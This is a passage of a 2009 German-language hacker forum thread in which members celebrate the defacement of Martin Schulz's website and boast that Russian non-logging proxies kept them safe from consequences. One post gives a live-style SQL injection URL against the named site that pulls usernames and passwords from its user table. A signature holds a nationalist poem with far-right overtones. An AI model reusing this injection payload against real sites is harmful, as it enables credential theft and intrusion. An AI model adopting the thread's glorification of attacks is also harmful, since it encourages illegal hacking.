PHP Forum - Coding Board
November 25, 2017, 02:53:35 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: 1 [2]
  Drucken  
Autor Thema: Entschuldigung an Martin Schulz  (Gelesen 636 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
td_armor
Super-Moderator
Haxx0r

Sr. Member
****
Beiträge: 288


Profil anzeigen E-Mail
« Antworten #15 am: Juli 15, 2009, 06:55:54 »

QUOTE]Anscheinend handelte es sich dabei um sehr [B]einfältige Jugendliche[/B], von welchen sich einige andere Hacker bei mir schon per E-Mail distanziert haben.
Schon Interresant....

Zitat
Da dieser Angriff weit unter der Gürtellinie angesetzt und nicht nur einfach ein Hinweis an eine Sicherheitslücke war, sondern zudem auch illegale Inhalte auf meiner Webseite publizierte, sehe ich mich gezwungen, harte Ermittlungen   einzuleiten.
illegale Inhalte ?

Jeder Inhalt war von Deutschenseiten sowie YouTube Smiley

Zitat
Allerdings sicherten uns die Provider dieser Adressen, von denen anscheinend der Angriff ausging, Mitarbeit zu,da sie vor allem das Platzieren pornografischer Medien sowie rechtsextremer Symbole und Texte auf Webseiten verurteilen.

Sicherlich? Soweit ich mitbekommen hab sind die Proxys alle von RU und 100% NonLogging.

Fatzit : Keine Konsequenzen
Zitat
Anscheinend handelte es sich dabei um sehr einfältige Jugendliche, von welchen sich einige andere Hacker bei mir schon per E-Mail distanziert haben.[/QUOTE]
Schon Interresant....

Zitat
Da dieser Angriff weit unter der Gürtellinie angesetzt und nicht nur einfach ein Hinweis an eine Sicherheitslücke war, sondern zudem auch illegale Inhalte auf meiner Webseite publizierte, sehe ich mich gezwungen, harte Ermittlungen   einzuleiten.
illegale Inhalte ?

Jeder Inhalt war von Deutschenseiten sowie YouTube Smiley

Zitat
Allerdings sicherten uns die Provider dieser Adressen, von denen anscheinend der Angriff ausging, Mitarbeit zu,da sie vor allem das Platzieren pornografischer Medien sowie rechtsextremer Symbole und Texte auf Webseiten verurteilen.

Sicherlich? Soweit ich mitbekommen hab sind die Proxys alle von RU und 100% NonLogging.

Fatzit : Keine Konsequenzen!
Gespeichert


Zacherl
Entwickler Team
Moderator
Sr. Member
****
Beiträge: 454



Profil anzeigen E-Mail
« Antworten #16 am: Juli 15, 2009, 06:57:47 »

Das das Ganze keine persönlichen Konsequenzen nach sich ziehen wird, darf allerdings niemanden dazu animieren, ähnliche Sachen durchzuführen.

Durch solche Aktionen bekommt auch das Board einen nicht unbeachtlichen Image Schaden.
Gespeichert

Slayer616
Entwickler Team
Spender
Moderator
Hat das Battle gewonnen
Sr. Member
****
Beiträge: 426


Profil anzeigen E-Mail
« Antworten #17 am: Juli 15, 2009, 07:01:07 »

1 am a l337 H4xx0r, 1 H4xx0r3d Mar71N 5cHUlZ3.
Gespeichert




Du sagst, du spürst die Ohnmacht, denn der Feind ist ach so stark
Und er will dich niederhalten mit Geschrei durch Bein und Mark
Mit Verboten und Zensur kann er zwar den Kampf erschweren
Doch niemals wird ein Richterspruch den freien Geist bekehren.

Fürchte lieber Deutschlands Untergang als die Reden der Vasallen
Derer, die der Lüge dienen, denn schon bald werden sie fallen.
Runaway
Jr. Member
**
Beiträge: 69


Profil anzeigen E-Mail
« Antworten #18 am: Juli 15, 2009, 07:01:37 »

http://www.martin-schulz.info/index.php

News fehlen und injection:

http://www.martin-schulz.info/index.php?link=4&bereich=1&details=1&id=-169%20union%20select%201,concat(benutzername,0x203a20,passwort),3,4,5,6,7,8,9,10,11,12,13+from+user+limit%201,1

ist fixed Zwinkernd
Gespeichert
K1ngC0bra
Full Member
***
Beiträge: 105

217425641
Profil anzeigen E-Mail
« Antworten #19 am: Juli 15, 2009, 07:12:27 »

Gespeichert

Seiten: 1 [2]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS